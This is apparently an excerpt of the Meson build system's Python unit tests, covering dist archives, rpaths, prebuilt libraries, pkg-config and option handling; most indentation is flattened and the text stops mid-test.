def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}', version: '1.0')".format(name))
return path
def dist_impl(self, vcs_init, vcs_add_all=None, include_subprojects=True):
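        # Create a throwaway project (optionally with subprojects), run
        # 'meson dist' in both tar.xz and zip formats, and verify the
        # generated archives, checksum files, and their contents.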
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write(textwrap.dedent('''\
project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
subproject('samerepo', required : false)
'''))
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write(textwrap.dedent('''\
#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
'''))
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
if vcs_add_all:
vcs_add_all(self.create_dummy_subproject(project_dir, 'samerepo'))
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
                # Verify that without --include-subprojects we have files from
                # the main project and also files from subprojects that are
                # part of the main vcs repository.
z = zipfile.ZipFile(zip_distfile)
expected = ['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']
if vcs_add_all:
expected += ['disttest-1.4.3/subprojects/',
'disttest-1.4.3/subprojects/samerepo/',
'disttest-1.4.3/subprojects/samerepo/meson.build']
self.assertEqual(sorted(expected),
sorted(z.namelist()))
                # Verify that with --include-subprojects we now also have files
                # from the tarball and separate-vcs subprojects, but not files
                # from unused subprojects.
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
expected += ['disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/vcssub/meson.build']
self.assertEqual(sorted(expected),
sorted(z.namelist()))
if vcs_add_all:
# Verify we can distribute separately subprojects in the same vcs
# repository as the main project.
subproject_dir = os.path.join(project_dir, 'subprojects', 'samerepo')
self.new_builddir()
self.init(subproject_dir)
self.build('dist')
xz_distfile = os.path.join(self.distdir, 'samerepo-1.0.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
tar = tarfile.open(xz_distfile, "r:xz")
self.assertEqual(sorted(['samerepo-1.0',
'samerepo-1.0/meson.build']),
sorted([i.name for i in tar]))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '40 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
                self.assertIsNone(rpath)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
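        # The compile database may use GCC-style (-D) or MSVC-style (/D)
        # defines, and the backend may or may not quote each argument, so
        # accept any of the four forms below.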
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '151 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '151 reserved targets')
targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
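        # Return the host C compiler, its static linker, and the platform's
        # object file and shared library suffixes.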
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
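        # Compile a single source file to an object file, using /Fo-style
        # arguments for MSVC-like compilers and -c/-o otherwise.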
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
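        # Create a static archive using the detected static linker; the linker
        # object supplies the correct tool and argument style (lib.exe vs ar).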
if extra_args is None:
extra_args = []
        link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
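        # Link a shared library directly with the compiler: link.exe-style
        # arguments for MSVC, otherwise -shared (adding -fPIC and a soname
        # where the platform needs them).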
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
        Test that we prefer static libraries when `static: true` is
        passed to dependency() with pkg-config. Can't be an ordinary test
        because we need to build libs and try to find them from meson.build.
        Also test that unsatisfiable library deps are not a hard error,
        since system libraries such as -lm will never be found statically.
        https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
@mock.patch.dict(os.environ)
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
        # pkg-config and pkgconf do not emit the compile args in the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '41 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
    # When running under Travis Mac CI, file updates seem to happen too fast,
    # so the timestamps do not get properly updated. Call this method before
    # file operations in appropriate places to make things work.
def mac_ci_delay(self):
if is_osx() and is_ci():
import time
time.sleep(1)
def test_options_with_choices_changing(self) -> None:
"""Detect when options like arrays or combos have their choices change."""
testdir = Path(os.path.join(self.unit_test_dir, '85 change option choices'))
options1 = str(testdir / 'meson_options.1.txt')
options2 = str(testdir / 'meson_options.2.txt')
# Test that old options are changed to the new defaults if they are not valid
real_options = str(testdir / 'meson_options.txt')
self.addCleanup(os.unlink, real_options)
shutil.copy(options1, real_options)
self.init(str(testdir))
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'b')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
self.wipe()
self.mac_ci_delay()
# When the old options are valid they should remain
shutil.copy(options1, real_options)
self.init(str(testdir), extra_args=['-Dcombo=c', '-Darray=b,c'])
self.mac_ci_delay()
shutil.copy(options2, real_options)
self.build()
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == 'combo':
self.assertEqual(item['value'], 'c')
self.assertEqual(item['choices'], ['b', 'c', 'd'])
elif item['name'] == 'arr':
self.assertEqual(item['value'], ['b', 'c'])
self.assertEqual(item['choices'], ['b', 'c', 'd'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'],
cwd=workdir,
stdout=subprocess.DEVNULL)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
for l in ['cpp', 'cs', 'd', 'java', 'cuda', 'fortran', 'objc', 'objcpp', 'rust']:
try:
comp = env.detect_compiler_for(l, MachineChoice.HOST)
with tempfile.TemporaryDirectory() as d:
comp.sanity_check(d, env)
langs.append(l)
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in {'c', 'cpp', 'd'}:
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in {'java'}:
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '173 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '182 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('WARNING: target links against shared modules. This is not '
'recommended as it is not supported on some platforms')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
            # Static libraries are not linkable with -l with msvc because meson installs them
            # as .a files, which unix_args_to_native will not recognize since it expects
            # libraries to use .lib as the extension. For a DLL the import library is installed
            # as .lib. Thus for msvc this test needs to use shared libraries to exercise the
            # path-resolving logic in the dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
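            # self.prefix is an absolute path; strip the leading separator so
            # os.path.join keeps the result inside the staged installdir.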
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
            # assert that the user of the library will be rebuilt
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
            # restore dirs for the next test case
            self.installdir = initial_installdir
            self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'static')
self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
self.assertEqual(obj.options[OptionKey('set_sub_opt')].value, True)
self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
else:
self.assertIn('as both', str(cm.exception))
self.init(testdir)
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
else:
self.assertIn('as both', str(cm.exception))
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
msg = "Option 'foo' must have a value separated by equals sign."
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.init(testdir, extra_args=['-Dfoo'])
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn(msg, cm.exception.output)
else:
self.assertIn(msg, str(cm.exception))
self.init(testdir)
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.setconf('-Dfoo')
if isinstance(cm.exception, subprocess.CalledProcessError):
